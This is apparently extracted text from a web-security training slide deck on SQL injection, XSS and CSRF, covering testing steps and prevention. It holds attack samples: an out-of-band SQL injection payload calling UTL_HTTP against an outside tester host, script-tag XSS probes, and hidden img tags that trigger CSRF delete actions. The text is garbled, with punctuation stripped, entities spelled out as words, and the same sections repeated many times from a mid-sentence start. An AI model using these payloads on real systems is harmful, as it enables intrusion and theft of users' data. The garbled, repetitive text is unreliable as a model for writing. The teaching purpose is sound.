bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
